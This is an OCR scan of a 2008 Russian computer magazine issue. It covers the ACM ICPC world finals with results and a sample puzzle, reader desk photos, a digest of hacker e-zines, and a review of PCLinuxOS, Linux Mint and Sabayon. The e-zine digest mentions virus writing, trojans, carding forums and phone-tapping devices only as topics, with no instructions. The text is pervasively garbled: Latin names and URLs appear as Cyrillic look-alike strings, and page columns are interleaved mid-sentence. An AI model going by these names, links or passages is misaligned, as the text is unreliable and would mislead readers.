каждого ВУЗа могла быть заявлена только одна команда, состоящая из трех 
участников — студентов либо аспирантов этого учебного заведения. 

У России в этом году было весьма впечатляющее как по количеству, так и 
по именам, представительство из 11 команд: Алтайский ГТУ, Спб ИТМО, 
Ижевский ГТУ, МГУ, МФТИ, Новосибирский ГУ, Орловский ГТУ, Петрозавод- 
ский ГУ, СпбГТУ, Ставропольский ГУ и Уральский ГУ. Также среди участни- 
ков были такие известные вузы, как МІТ, Стэнфорд, Оксфорд и Принстон. И 
конечноже, на финал 2008 приехали победители прошлогоднего турнира 
— команда Варшавского Университета. 

Команды начали прибыватьв Банфзатри дня дофинального соревнова- 
ния: нужно было отдохнуть после сложного перелета (многие летели с тре- 
мя-четырьмя пересадками), более-менее привыкнуть кновому часовому 
поясу (-9 часов от Москвы) и сориентироваться на достаточно интересной 
местности: Банф представляет собой оченьуютный маленький городок, 
окруженный высокими скалистыми горами и национальным парком с 
термальными источниками. 

Думаю, что эти три дня до финального соревнования были счастливыми для 
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> СІѴСІ 

На нашем диске ты 
найдешь РйГ-доку- 
менты с задачами с 
прошлых чемпиона- 
тов, а также фотогра- 
фии с финала АСР 
ІСРС 2008 в Канаде. 




> Ііпкз 

• ісрс.ЬаѵІог.есІи 

— официальный сайт 
Чемпионата. Тутты 
можешь посмотреть 
фото и видео-архив, 
скачатьзадания с пре- 
дыдущих соревнова- 
ний и получить любую 
другую информацию о 
Чемпионате. 

• ѵѵѵѵѵѵ.зпагкпеѵѵз.іпіо 

— новости российских 
и международных 
чемпионатов по про- 
граммированию. 

• ѵѵѵѵѵѵТорсосіег.сот 

— сайт «сольного» 
чемпионата для про- 
граммистов. 

• ѵѵѵѵѵѵ.орепсир.ги 

— открытый чемпио- 
нат МГУ по програм- 
мированию. 

• доодіе.сот/сосіеіат 

— чемпионат сослано, 
который проводит 
Ооодіе. 

• астТітиз.ги — сайт 
УрГУ, посвященный 
олимпиадам по про- 
граммированию. Тут 
размещен выдающий- 
ся архив задач и про- 
веряющая система. 




Команда из Петрозаводска решаеттретью задачу 



всех, кто приехал на Чемпионат: огромный поток новых впе- 
чатлений, великолепная организация и позитивные эмоции 
отобщения с многонациональным «облаком» студентов -еди- 
номышленников заставляли людей перебарывать часовые 
пояса и чувствовать себя бодрыми. 

Однако, чем ближе был финал, тем неохотнее участники гово- 
рили о нем, предпочитая разговаривать о погоде, ледниках и 
клубнике на завтрак. Все-таки, цена приближающегося фина- 
ла для каждого из участников была огромна: каждый проделал 
большой путь, чтобы попасть сюда. В этом смысле каждый из 
трехсотучастников финала АСМ ІСРС уже был победителем: 
он проделал невероятную работу, чтобы приехать и участво- 
вать в этом чемпионате. Но каждый, кто приехал — приехал не 
только чтобы участвовать, но и чтобы попытаться выиграть. А 
сделать это было ой как не просто. 

г финал 

Для решения 11 предложенных в этом году задач участ- 
никам было отпущено 5 часов, и 9 апреля в 8 утра время 
пошло. Соревнование проходило в большом зале, где было 
размещено сто столов, сто компьютеров и триста стульев. 
Участники были физически изолированы и могли пользо- 
ваться только тем, что было на их столах: бумагой, ручками, 



Китайский студент за работой 



калькуляторами и одним компьютером с установленными 
компиляторами С, С++ и Оаѵа — язык каждая команда могла 
выбирать по своему усмотрению. Помимо этого, конечно, 
присутствовал доступ к полуавтоматической тестирующей 
системе для проверки решений, которая прогоняла тес- 
тируемую программу на наборе тестов, проверяя коррект- 
ность работы. 

Главный показатель, по которому оценивается выступление ко- 
манд — это количество решенных задач. На втором месте стоит 
параметр «время», который формируется как сумма времен, 
прошедших с начала соревнования до принятия тестирующей 
системой каждой из отправленных задач. Также к этому добав- 
ляется по 30 минут штрафного времени за каждую неудачную 
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тестирующую попытку, если в итоге эта задача была принята системой. 

Само соревнование, несмотря на отсутствие какого-то активного действия, 
не смотрится скучно. Во-первых, это заслуга прекрасной организации: 
результаты ко манд транслируются опііпе на больших дисплеях и можно 
наблюдать живую статистику: кто сколько задач решил, какие задачи 
проверяются, какие задачи решают чаще всего — и так далее. Во-вто- 
рых, после начала соревнования всем желающим раздали сами задачи 
и каждый могпопробоватьсвои силы в их решении — во всяком случае, 
поразмышлять над ними. Ну и в-третьих, во время финала в зале стояла 
такая мощная творческая и созидательная атмосфера, что оттуда совсем не 
хотелось уходить. 

г РЕЗУЛЬТАТЫ 

Выше я написал, что результаты транслировались опііпе на больших экранах. 
Однако за час до окончания конкурса эти результаты перестали публиковать- 
ся: на экранелишьпоказывалисьпроверяемые задачи, результаты проверки 
не демонстрировались и было непонятно, какие задачи засчитаны, а какие 
— нет. По замыслу организаторов это должно было сохранить интригу до 
финального объявления результатов. И сохранило бы, если бы одна из команд 
не решила больше всех задач. Ведь в этом случае пришлось бы считать время, 
а сделать это в формате кулуарных разговор — нереально. 

Однако, судьба, знания и талант ребят из ИТМО (Санкт-Петербургский Госу- 



Пример задачи: 
поиск пароля 

Хочешь попробовать свои силы в решении задач с Чемпионата? 
Нет проблем. Вот сокращенный и адаптированный перевод 
одной из задач. 

Условие: ты — компьютерный взломщик и почти взломал крутей- 
шую систему. Одна проблема — тебе нужен особый пароль, о котором 
ты знаешь совсем немного. 

Известно, что он состоит из букв алфавита [а -г] , кроме того ты 
можешь узнать его длину и некоторые его части (которые могут пере- 
крывать друг друга) . И конечно, неизвестно, где конкретно в пароле 
они располагаются. 

Задача: написать программу, которая из входной информации (дли- 
на пароля, некоторые куски пароля, которые могут пересекать друг 
друга) будет определять число возможных паролей и если это число 
не больше 42, то выводить все варианты. 

Входные данные таковы, что число вариантов пароля не больше 
10 л 15. Длина пароля от 1 до 25, число известных кусков пароля — от 
О до 10. 



дарственный Университет ИнформационныхТехнологий, Механики и 
Оптики) распорядились по-другому: они решили 8 из 1 1 задач и сразу после 
окончания соревнования можно было с достаточными основаниями пола- 
гать, что именно они и выиграли Чемпионат. 

В итоге, таки получилось. Финальные результаты (12 призеров): 



МЕСТО ВУЗ ЗАДАЧИ ВРЕМЯ 



1 


Санкт-Петербургский 
Университет ІТ, 
Механики и Оптики 


8 


1187 


2 


Массачусетский 
Институт Технологии 


7 


997 


3 


Ижевский ГТУ 


7 


1008 


4 


Львовский Университет 


7 


1010 


5 


МГУ 


7 


1165 


6 


Университет Цингуа 


7 


1347 


7 


Стэнфорд 


7 


1354 


8 


Загребский Университет 


7 


1404 


9 


Университет Ватерлоо 


7 


1597 


10 


Петрозаводский 

Государственный 

Университет 


6 


819 


11 


Санкт-Петербургский 

Государственный 

Университет 


6 


826 


12 


Белорусский 

Государственный 

Университет 


6 


857 



^ЗАКЛЮЧЕНИЕ 

Для обычного человека спортивное программирование — понятие сродни 
айсбергу. Видна лишь малая часть и та часть, которая скрыта, как раз и 
представляет собой наибольшую значимость. Потому что любой финал лю- 
бого Чемпионата Мира был бы невозможен без долгой подготовки участни- 
ков, без фундаментального обучения и накопления знаний, без тренировок 
и участия в многочисленных отборочных раундах. Финал АСМ ІСРС — как 
раз вершина айсберга, под которой находятся тысячи команд и участников, 
эксбибайты накопленныхзнаний и долгие годы учебы итренировок. 

Но именно все это и представляет наибольшую ценность: это будущее чело- 
вечества и фундаментальной науки. Кто знает, может, кто-то из этих парней 
в будущем поможет разработать систему для предсказания землетрясений 
или для моделирования развития и лечения неизлечимых болезней. 

Вот что сказал Билл Паучер, исполнительный директор АСМ: «Энергия, 
свежие идеи и талант этих суперзвезд способны помочь обществу в 
решении многих проблем и изменить мир к лучшему. Они умеют работать в 
команде, и они добьются успеха, значительно расширяя возможности, кото- 
рые мы используем сегодня для взаимодействия друге другом». НС 
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МЕО^ШЛШІЕИ 






•Эдуард «Бкуііпе» Ляпунов (5куІіпе_75(9таі1.ги) проектировал свой воркспейс^І 
[так, чтобы было все под рукой и ничего не отвлекало. Первое, уверен, получилось. 
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Юідііаі Саі [сІіді{аІ_саШІІ5І.ги] , большая поклонница Криса Касперски 
античата и убунты, собрала ноутбуки со всего подъезда|Ш^^^ЬЛв[ 












сцена 



Пришли на та§агі пе@геа1 . хакер. ги фотку своего действительно хакерского 






рабочего места (в хорошем разрешении) и мы опубликуем ее в следующих 





номерах! 




ІСветленький рабочий стол убунты и кошмарная голова Эйнштейна в 
|висте. Реітиз (сіеітизтеізіегісідтаіі.сот) очень сим вол ичен.Д 






Константин Паньков (кзргеійтзп.сот) всерьез увлекся 
робототехникой. Собирает кошмарного шестиноптТИ 




ІАлександр Яницкий (уаІехапсІег(с)уапсІех.ги] собрал приличную 
коллекцию дисков. Видимо, торренты до него еще не доползли. 




Рабочее место Махаона (аѵеІ_01 едойЬк.ги). Приятная неоно- 
|вая лампа, выдранная с шлейфами мамка... романтика, блин 














ІМАРИЯ «МІРВШ.» НЕФЕДОВАІ 



Ни для кого не секрет, что бумажная 



Не наши 



пресса берется освещать далеко не 



Электронных журналов, кото 



все достижения человеческой мысли 



рые принято называть езинами 



особенно когда речь заходит не о 



(от английского е-гіпе, то есть 



ЫеІесТгопіс ша§а2Іпе), существует 



совсем легальных или совсем неле 



гальных вещах. Разве можно отыскать 



великое множество. Одни совсем 



в солидном глянцевом издании подроб 



еще молоды, другим уже больше 



ную инструкцию по написанию трояна 



л десятка лет и они могут похвас 



таться богатой историей и заслу 



который ты держишь в руках 



Дженной репутацией. Некоторые 



освещают весьма узкопрофильные 



темы, другие же пишут о широ 



ком спектре событий и новшеств 



мер больше печатных 



компьютерного андеграунда. Чтобы 



вниманию дайджест наиболее инте 



ресных на сегодня езинов 



на досуге 



хакерских езинов 



конечно, 


приятное исключение, 


но 


речь 


не 


об этом. Речь, дорогой 


чита- 


тель 


, об 


электронных изданиях, 


кото-1 


рые 


могут позволить себе не в 


при-| 
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ТШ&- ѵтебе было проще ориентировать- 






НМ ^ ііся в этих внушительных потоках 
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Г'^^Иіинформации, представляю твоему 
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Открывает список легендарный 
РЬгаск, без которого, наверное, 
не обходится ни один обзор такого 
рода. И — совершенно заслужен- 
но! В ноябре 2008-го РЬгаск’у 
исполнится 23 года. На заре 
компьютерной эпохи его приду- 
мали два человека — Тагап Кіпд 
(в миру — Рэнди Тишлер) и КпідМ: 
ЫдЫпіпд (Крэг Нейдорф). Они же 
курировали свое детище много 
лет, приложив руку к выходу 30 
номеров. К чему это я? Да просто 
«героев надо знать в лицо». 
Первый выпуск, датированный 85-м 
годом, представлял собой архив 
разношерстныхтекстов, которые 
объединяло одно общее звено — ха- 
кинг. Будь то околонаучная статья, 
написанная языком учебника для 
«технарей», или инструкция по са- 
мостоятельной сборке бомбы (было 
итакое), — РЬгаск пропагандировал 
свободу, анархизм и «взлом» окру- 
жающей действительности. Пос- 
ледующие номера быстро обросли 



многие годы — было очевидно, что, 
так или иначе, ноэтотезин войдет в 
историю. 

За двадцать с лишним лет РЬгаск 
пережил не одну встряску и 
побывал под угрозой закрытия. 
Были суды, менялись редакторы, 
возникали длительные перерывы 
в работе, но все же РЬгаск устоял 
и издается до сих пор. Сейчас над 
езином работает команда моло- 
дых ребят, называющих себя ТЬе 
Сігсіе 1_05* Наскегз или просто 
ТСІ_Н. Они стремятся вернуть 
журналу прежний дух, который 
слегка утерян из-за постоянных 
смен редакционных составов и 
взросления авторов. В целом, 
РЬгаск остается все тем же — пи- 
шет о людях и событиях, о новых 
разработках и идеях, о реализа- 
ции этих идей и, конечно, общает- 
ся с читателями. Без зазрения 
совести его можно назвать одним 
из самых читаемых и узнаваемых 
езинов на планете. 



файлу (или, скорее, наш профайл 
аналогичен РЬгаск’овской рубрике). 
Езин быстро завоевал популярность 
благодаря свободному распростра- 
нению и интересным, качественным 
материалам. Когда в конце 86-го во 
РЬгаск'е опубликовали тот самый 
«Манифест хакера» авторства 
ТЬе Мепіог — и он стал знаменем 
и гимном хакеров всего мира на 



новыми (а в будущем — постоян- 
ными) рубриками, пришедшимися 
читателям по душе. Хороший тому 
пример — РЬгаск ѴѴогШ Меѵѵз.то 
есть, как можно понять из названия, 
последние новости, слухи и события 
в сфере ІТ-андеграунда. Был и раз- 
дел, где регулярно публиковались 
биографии известных личностей, 
по сути, аналогичный нашему про- 



Нп_р^/нии.50Пр],° г §/Щ1 
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Этот итальянский езин основан 



Так каккомандузрі изначально ин- 
тересовали самые разные области 
информационной безопасности, 
журнал получился многогран- 
ным. Об этом говорит и довольно 
обтекаемый подзаголовок издания 
— зесигііу гпадагіпе. В принципе, 
в этом плане ВЕІ во многом похож 
на РЬгаск (в самом РЬгаск’е работу 
зО^рі охарактеризовали как«І\Іісе 
глад»). Здесь пишуто всевозможных 
взломах и технологиях оных, выкла- 
дывают собственные наработки в 
области софта, такие как, например, 
небезызвестный К5ТАТ (Кегпеі 
БесигНуТЬегаруАпЬ-ТгоІІз). Пода- 
ется все это, конечно же, в стиле «от 
хакеров хакеру». 



десять лет назад итальянской 
же хак-группой 5(ШРгО]есІ (в 
сокращении «зСНі:рр> или «зрі»). 
Команда довольно известная, 
порой в западной прессе встреча- 
ются интервью с ее участниками, 
но состав группы не разглашается 
— таково единогласное решение 
мемберов. Выпуски журнала 
появляются не очень регулярно, 
однако, несмотря на вольные 
сроки релизов, езин продолжает 
выходить. На данный момент он 
публикуется на четырех языках — 
итальянском, английском, фран- 
цузском и испанском. Справед- 
ливости ради замечу, что статей 



на итальянском — подавляющее 
большинство, но редакция пишет, 
что будет рада сотрудничеству с 



переводчиками, так что надежда 
на переводы как новых, так и 
старых публикаций есть. 
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Еще один «вирусный» езин, о 
котором не знаеттолько ленивый и о 
котором в ][ писали уже не раз. Заро- 
дившаяся в середине 90-х годов (на 
испанской ВВ5) вирусмейкерская 
группа 29Атоже небезызвестна 
— каки их детище. Что характерно, 
большей частью они запомнились 
не чудовищным разрушитель- 
ным эффектом своих вирусов, а 
новизной и свежестью подхода к их 
созданию. 

Журнал закономерно вырос изтой 
самой борды и ІРС-общения коман- 
ды. В какой-то момент количество 
идей, наработоки информации, 
родившихся у лучших вирусмейке- 
ров планеты, стало так велико, что 
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захотелось поделиться этим добром 
со всем миром. Ребята принялись 



за составление первого выпуска 
собственного езина и проработали 



над ним около года. Впоследствии 
за журналом закрепилась именно 
такая периодичность выхода, и 
новый номер 29Адо сих пор вы- 
пускается раз в год. Для скептиков, 
которые считают, что год это слиш- 
ком, замечу, что издание получается 
максимально информативным и 
продуманным до последней буквы и 
кусочка кода. 

Состав команды за прошедшие 
годы, конечно, претерпел измене- 
ния — одни ушли со сцены, другие 
остались, на смену «старикам» при- 
шли молодые таланты (кстати, среди 
них есть и наши соотечественники). 
Но, в целом, езинуверенно держит 
планку. 
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Итак, мы 


добрались до второй части 








дайджеста 


, где речь уже пойдет о 





как большая часть 


наших езинов 


имеет 


1 


неприятную тенденцию загибаться 


после 










выхода нескольких 


номеров, попробу- 





русскоязычных езинах. Таковых у нас ем сделать срез наиболее интересных” 



насчитывается немало, и перечислить актуальных и - главное - 



все невозможно, чисто физически. Так живых изданий 
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Открывает русскую часть подбор- 
ки НаскСоппесІ, заявивший о 
себе в конце 2006-го лаконичным, 
но амбициозным сообщением: 

«НаскСоппесЕРІІ это первая, и 
надеюсь, что успешная попытка 
встряхнуть РУ-сцену и объеди- 
нить ее». Попытка, к сожалению, 
оказалась не стольудачной, как бы 
того хотелось, и вскоре проект был 
объявлен закрытым. Сайт, правда, 
продолжил свое существование, 
но уже исключительно в качестве 
площадки для езина, в написание 
которого все, в итоге, и вылилось. 

Планировалось издавать несколько 
журналов параллельно, в частнос- 
ти — успел появиться один езин, 
целиком посвященный нашей, рос- 
сийской сцене. Но затем произошла 
переориентация, и было решено 
свести все воедино. 






о 



Ьаск.соппесі 




На сегодня в свет вышло два но- 
мера, ведется работа над третьим. 
Ориентировочная дата релиза — 
конец лета — осень этого года 
(с 2008-го журнал будет выходить 
раз в год). 

Тематика журнала довольно об- 
ширная. Вот, например, выдерж- 
ка с сайта издания относительно 
того, что планируется включить 
в третий номер: «Будет статья 
про ореп55І_ ІіЬ с примерами 
кодинга на С или РНР; Борьба с 
ботами веб-форм; Первое круп- 
ное обновление ізЬр; Апдейты 
ѵѵір в сторону оптимизации; 
Пара-тройка материалов на тему 
ѵх/гаі; Статья об исследова- 
нии протокола МРІМ; Перевод 
чего-либо интересного из-за 
бугра; 1 -2 статьи на тематику *піх 
безопасности». 
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Сайт ез ина временно закрыт на 
реконструкцию, но скачать три 
первых выпуска там все равно 
можно. Журнал выпускают с 
конца 2006 года и пишут здесь 
не только о взломе, фрикерс- 
тве и иже с ними, но и о других, 
близких сердцу компьютерщика, 
вещах. Так, во втором и третьем 
номерах можно найти статью о 
нестандартном моддинге (в двух 
частях), ностальгический обзор 
приставочных эмуляторов и 



почитать, как редакция прово- 
дила опрос девушек на улицах, с 
целью разведать, что они знают 
о компах. В то же самое время, 
проскакивают инструкции по 
сборке штук, вроде аппарата для 
записи телефонных разговоров 
путем подключения девайса к 
телефонной линии. Что назы- 
вается — приятное с полезным. 
Езин выходит в формате .рсК, 
так что — веселые картинки в 
комплекте. 



іѴ'нг 



ЗАЯ 



для искушенных, притом, их 
здесь в избытке. 

Издается езин с 2004 года. Архив 
насчитывает уже 16 выпусков. 
Помимо вышеупомянутого, в 
журнале присутствуют новости и 
интервью с видными личностями 
*піх комьюнити. Жители Украины 
могут прямо на сайте оформить 
подписку на бумажную версию 
журнала, выпускать которую на- 
чали совсем недавно. Это, между 
прочим, далеко не единствен- 
ный пример того, какиз езина 
вырастает печатный журнал. 

В какой-то мере — показатель 
серьезности и рентабельности 
издания. ИИ 
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Портал хакеру.ги — место довольно 
известное в рунете. Здесьуже 5-ый 
год обсуждаются практически 
любые аспекты хакерского бытия. 
Для тех, кто не знает (такие есть?!) 

— сайт, по сути, представляетсобой 
большую борду с рядом закрытых 
разделов. Например, в форум для 
кардеров попасть не так-то просто 

— нужны поручители и каждого 
нового участника тщательно 
проверяют. К тому же, для доступа 
в «кардин г» требуется взнос в 
фонд форума в размере $30. Это 
не единственный пример. Ресурс 
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Конечно, не включить в подбор- 
ку ни одного езина для линук- 
сойдов было бы моветоном! 

Так что, радуйтесь, любители 
опен сорца, это издание как 
раз для вас. Людям «не в теме», 
впрочем, тоже не стоит пугаться 
— издание ориентировано не 
только на бородатых админов, но 
и новичков. Здесь вполне можно 
найти пошаговые руководства 
(с картинками) по установке, 
например, той же РгееВЗО, плюс 
множество полезных советов, 
сравнительные статьи и тому 
подобные, полезные в хозяйс- 
тве, вещи. С другой стороны, 
имеются и серьезные материалы 



очень полезный, а с 2006 года здесь 
еще и выпускаютсобственный езин. 
Пока вышло всего два номера, но не 
за горами и третий. Тематика статей 
самая разная, начиная от всяческого 
фрикерства или РАО по обращению (ле- 
тальному и не очень) с аукционом ЕВау 
— вплоть до советов по кардингу или 
по защите от ОйоЗа. Все материалы 
пишутся понятным языком, такчто ра- 
зобраться сможет даже начинающий. 
Кстати, в форуме, посвященном ези- 
ну, принимаются пожелания относи- 
тельно того, что бы публика хотела 
увидеть в следующем номере. 
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вов в первой десятке практически неизменен. При 
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чем, что представляют собой РСІлпихОЗ, Міпі:, ЗаЪауоп и МЕРІЗ, большинс 



ипіхоіб 



0І5ТР0ѴѴАТСН.С0М 



четверка 

ИННЯР^- , г 

р г 

л г і # і 1 /:(МЕгоИПИ 



!■ *’чё . /■' 

ч. . 



ОБЗОР ЧЕТЫРЕХ ПОПУЛЯРНЫХ ДИСТРИБУТИВОВ ИЗ ПЕРВОЙ ДЕСЯТКИ 



Если последить за рейтингом сайта ОізПоѵѵаіісп.сот, то можно заметить, ' 

-л/' -л ' ' :■ ■ 1 ■.ѵ/.у- 1 - ѵ 



состав 



• ■ , - тво русскоязычных пользователей, скорее всего, даже не догадываются 
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Постоянное присутствие в ТОП-10 — чем не повод познакомиться с ними? 
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^ РСЫМІІХ05 2008 

Разработчик РСЫпихОБ — Билл «Техвіаг» Рейнолдс, несколько лет под- 
держивавший неофициальный репозиторий для Мапбгаке. Вечная гонка 
ему надоела и, собрав все свои наработки, он решил создать собственный 
вариантпопулярного дистрибутива. Основной фишкой РСЫпихОБ должна 
была стать работа в режиме ЫѵеСО, чего на тот момент в Мапбгаке не было. 
Билл поставил себе целью сделать новый дистр еще проще в освоении, чем 
оригинал (девиз проекта — «Рабісаііу Бітріе»). В РСЫпихОБ изначально 
включено максимальное количество кодеков, драйверов, популярных пла- 
гинов и всего, что обычно юзер доустанавливает сам. Практика показывает, 
что РСЫпихОБ дружите большим количеством оборудования, чем Мапбгіѵа 
(в том числе, «ноутбучным»). Здесьтакже используются РРМ-пакеты, но в 
качестве системы для работы с репозиториями выбран дебиановский АРТ 
с графическим интерфейсом Бупарйс. В итоге, пакет или всю систему очень 
просто обновить до последней версии. Разработчики поддерживаютсвой 



репозитории, количество пакетов в котором постоянно растет и сегодня 
превышает 7000. Прижелании можно использовать пакеты из Мапбгіѵа 
— 1 00% совместимости никто не гарантирует, но и особых проблем пока не 
было. С обновлениями таких приложений, правда, придется повозиться 
самостоятельно. 

В качестве рабочей среды изначально предлагается КОЕ. Долгое время 
были доступны только «ргеѵіеѵѵз». Версия 0.93а (август 2006) была пред- 
ставлена втрех вариантах: МіпіМе, бипіоги Від Баббу. Чтобы упростить 
жизнь юзеру, все лишнее отсекается (особенно, в МіпіМе). Достоинство 
системы заключается втом, что подгонка идет путем наращивания, а 
не удаления — пользователь сам доустановит все, что захочет. Лично я 
голосую двумя руками за такой подход. В том же ІІЬипіи после установки 
можно найти много лишнего и какое-то время приходится тратить на чистку. 
Вариант МіпіМе предназначен опытным юзерам, которые сами устанавли- 
вают все, что им нужно, и затачивают систему под себя. Последней версией 
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РСІ_іпих05 2008 является именно МіпіМе. Сюда входитсильно урезанная 
версия КОЕ с небольшим количеством приложений. Асамый оснащенный 
вариант дистрибутива — это Від Оасісіу. 

При работе в ЫѵеСО предусмотрена запись настроек на 115В флешку. С по- 
мощью простых мастеров можно запустить процесс ремастеринга дистра, 
собрав его под свои нужды, и установить РСЫпихОЕ на сменный носитель. 
Основные настройки производятся в РСЫпихОЕ Сопігоі Сепіег (РСС), ко- 
торый является несколько переработанным Мапбгіѵа Сопігоі Сепіег. Те, кто 
имел дело с последним, без проблем разберутся с настройками. Ктомуже, 
Сопігоі Сепіег из состава КОЕ никуда не исчез. Похожие названия несколь- 
ко путают, даже когда знаешь, что ищешь. Для установки дистрибутива на 
жесткий диск вызывается инсталлятор Огакііѵе, знакомый по Мапбгіѵа. 
Процесс загрузки тоже напоминает Мапбгіѵа, но есть и свои особенности, 
разобраться с которыми нетрудно. Кстати, начиная с версии 2007, появи- 
лась весьма стильная тема оформления Оагк, которую даже не хочется 
менять послеустановки. 

Неочевидность механизма смены локализации — одно из неудобств 
РСІ_іпих05. Поиск пакетов с суффиксом ги в Вупарііс ничего не дает. 
Впрочем, порывшись на форумах, можно быстро найти подсказку. Следует 
открыть файл / еѣс / грт/тасгоз и изменить имеющуюся там строку на: 




Установить драйвер видеокарты в І_іпих Міпі просто 



%_іп8ба11_1апд8 ги : ги_Ки 

Затем переустанавливаем пакеты, втом числе и Зупарбс, Сопігоі Сепіег. 
Именно поэтому вариант МіпіМе — наилучший выбор (так как часть пакетов 
все равно приходится переустанавливать). 

Кроме версии КОЕ, есть и вариант РСЫпихОБ бпоте Есііііоп ( ѵѵѵѵѵѵ. 
ае{рсІіпихо5.сот/61\ЮМЕ ). Также стоит обратить внимание на ТіпуМе ( ѵѵѵѵѵѵ. 
тѵрсІіпихо5.сот/сіоки.рЬрАіпѵте:Иоте ) со средой ОрепЬох, который пред- 
назначен для использования на слабых компьютерах. 

Отметим, что у РСЫпихОЗ есть еще один минус — отсутствие версии для 
64-битных систем. 

г иыцхмштд.о 

Если ты считаешь, что лучшим дистром для новичка является ІІЬипІи, 
советую посмотреть в сторону ирландского І_іпих МіпІ.Утебя будут все 
основания изменить свое мнение. В одном из обзоров ОізІгоѵѵаІсЬ этот 
дистрибутив назван самым неожиданным решением 2007 года. Девиз 
проекта — Ргот ітеесіот сате еіедапсе («Из свободы приходит элегант- 
ность») — полностью соответствует подходу разработчиков. В начале Міпі 
представлял собой ІІЬипіи с Соплріг Ризіоп с установленными мультимедиа 
кодеками и поддержкой воспроизведения ОѴО, популярными плаги- 
нами для браузеров, Оаѵа, Реаі Ріауеги прочими компонентами. Таким 
образом, послеустановки пользователю нужно было меньшеусилий на 
доводку дистра. Теперь кэтому добавлено несколько оригинальныхутилит, 
помогающих в настройке, а также организована болееудобная рабочая 



среда. Проприетарные драйвера в комплект не входят (это противоречит 
принципам разработчиков), но при желании установить их легко. Еще одно 
достоинство Міпі — использованиетехже репозиториев, что и в Обиліи. 
Текущая версия 4.0 Оагупа основана на ІІЬипіи 7.1 0«ОиІ5у біЬЬоп» и пол- 
ностью совместима с ним по пакетам. Кстати, можно поступить и наоборот, 
подключив репозиторий Міпі к ІЛэипІи. 

Немаловажно, что разработчики и пользователи находятся в постоянном 
взаимодействии (не в пример РСЫпихОБ, в котором решение принимает, в 
основном, Техзіаг). Хорошая идея, высказанная на форуме проекта, быстро 
подхватывается и реализуется. Конечно, это только положительно сказыва- 
ется на динамичном развитии МіпГ 

В принципе, ІІЬипіи и Міпі во многом похожи, но Міпі ориентирован на 
юзера с меньшим уровнем подготовки. 

Доступно несколько вариантов дистрибутива с разными средами: КйЕ, 
6Ы0МЕ (Маіп Ес1Шоп),ХРСЕ, РІихЬох и Міпі (ОЫОМЕ и ОрепЬох). Причем, в 
случае с КйЕ есть полная ОѴй версия, размером 1 Гб, и урезанная тіпіКОЕ, 
в которой отсутствует часть приложений. 

Но есть еще две интересные редакции. Так, ЬідЫ: Есйбоп не с одержит коде ко в, 
проприетарного ПО и прочих патентованныхтехнологий. В качестве рабочей 
среды выбран 6Ы0МЕ. Его кратко можно охарактеризовать как«1)Ьип1и с 
удобствами». Вариант ОеЬіап Есіібоп, находящийся пока в альфе, — несколько 
иное направление. Он основан на нестабильной ветке ОеЬіап. Его появление 
преследует несколько за дач. Разработчики экспериментируютс переключе- 
нием базы дистрибутива натот случай, если с ІІЬипІи будут проблемы. Также, 
по их мнению, база ОеЬіап должна сделать Міпі быстрее, а переход между 



ХАКЕР 06 /114/ 08 



► 081 







^ ипіхоій 




> іп^о 

• Статью о йатпСтаи 
І_іпих, который также 
входит в ТОР-1 0, 
читай в ][ 02.2008. 

• В РСЫпихОБ изна- 
чально включено мак- 
симальное количество 
кодеков, драйверов, 
популярных плагинов 
и всего прочего, что 
обычно доустанавли- 
вает пользователь. 

• Проприетарные 
драйвера в Міпі не 
входят, это проти- 
воречит принципам 
разработчиков, но при 
желании установить 
их легко. 

• Игры БаиегЬгаІеп 
и Баѵаде можно 
запустить прямо из 
загрузочного меню 
БаЬауоп. 

• МЕРІБ научился 
изменять размер 
разделов ЫТРБ еще 
в те времена, когда в 
других дистрах об этом 
только мечтали. 

• Все дистрибутивы из 
обзора — это ЫѵеСО 

с возможностью 
установки на жесткий 
диск. 

• АІ6І_Х позволяет 
путем минимальной 
модификации сущес- 
твующего Х-сервера 
и за счет использова- 
ния библиотеки Меза 
получить ускоренный 
0реп6І_Х-сервер. 



релизами на порядок проще. Кроме того, в следующей версии 
5 (Еіузза), которая появится после анонса ІІЬипІи 8.04 (прибли- 
зительно в конце мая], ожидается выпуск Ргоі'еззіопаі Ебібоп, 
ориентированной на корпоративный сектор. 

Те, кто пользовался ІІЬипІи, в Міпі отличий не заметят. Меню 
загрузки несколько упрощено. По <Е2> можно выбрать только 
английский. Все приложения и рабочий стол выполнены в 
едином стиле, который напоминает КйЕ 4.0, хотя на самом 
деле используется версия 3.5.8. Локализовать интерфейстак 
же просто, как и в КІІЬипІи. Достаточно установить ш-пакеты 
или использовать Сопігоі Сепіег КОЕ. Да, и вместо кубунтов- 
ского Сопігоі Сепіег почему-то решили вернуться к старому 
Центру Управления КОЕ. 

На рабочем столе в ЫѵеСО-варианте расположен всего один 
ярлык, предназначенный для установки дистрибутива. В 
рабочей системе нет и его, десктоп пуст. В панели задач тоже 
практически ничего нет. Отсутствует даже традиционный 
переключатель виртуальных столов, хотя их активировано 
четыре! Все сделано для того, чтобы не запутать новичка. 
Впрочем, мне это нравится, у самого все по минимуму. Про- 
грамма установки дистра на хард насчитываетте же шесть 
шагов, что и в КІІЬипіи. 

МіпіАззізіапІ:, который встретиттебя после установки, позво- 
ляетшагза шагом сконфигурировать систему под свои нужды. 
Для установки приложений предлагается использовать Абері, 
КРаскаде и родной тіпііпзіаіі. В варианте с ОЫОМЕ — Бупарбс. 
Чтобы упростить настройку источников для новых файлов и 
обновлений, разработчики предлагают. тіпі файлы, в которых 
содержатся нужные ссылки. Именно их скачивает тіпбпзіаіі, 
позволяя юзеру установить все, что ему необходимо. Чтобы 
получить обновления, достаточно запустить тіпШрсІаІе. 

Для интегрированного видео от ІпІеІЗй ускорение включается 
автоматически, но и у обладателей картотАТІ и Ыѵібіа проблем 
не возникнет. Достаточно вызвать Епѵу и отметить флажком 
нужный драйвер. Остальное — уже его забота. 

Н5АВАѴ0Ы3.4Р 

ѴѴЬеп агі: тееіз іпзрігабоп — «Когда искусство встречается с 
вдохновением» — под таким девизом разработчики итальян- 
ского дистрибутива БаЬауоп ( уууууу.заЬауопбпих.огд ) решили 
сделать бепіоо чуточку ближе к пользователю. В БаЬауоп 
включено все, что необходимо для повседневной работы 
на современном компьютере. В наличии кодеки, драйвера 
для видеокарт, ѴѴіРі и других устройств (ввод параметра 
поргоргіеіагу отключит использование проприетарных драй- 
веров). БаЬауоп полностью совместим с Оепіоо; в качестве 
системы установки приложений используется рогіаде. 
Изначально БаЬауоп поставляется в виде ОѴО с вариантами 
для І386 и атсІ64. В таком дистрибутиве после установки есть и 
рабочие среды КОЕЗ.5.7, и 6ЫОМЕ2.18сосредствамилокали- 
зации, и приложения на все случаи жизни, и большое количес- 
тво игр. Реализована поддержка трехмерных рабочих столов. 
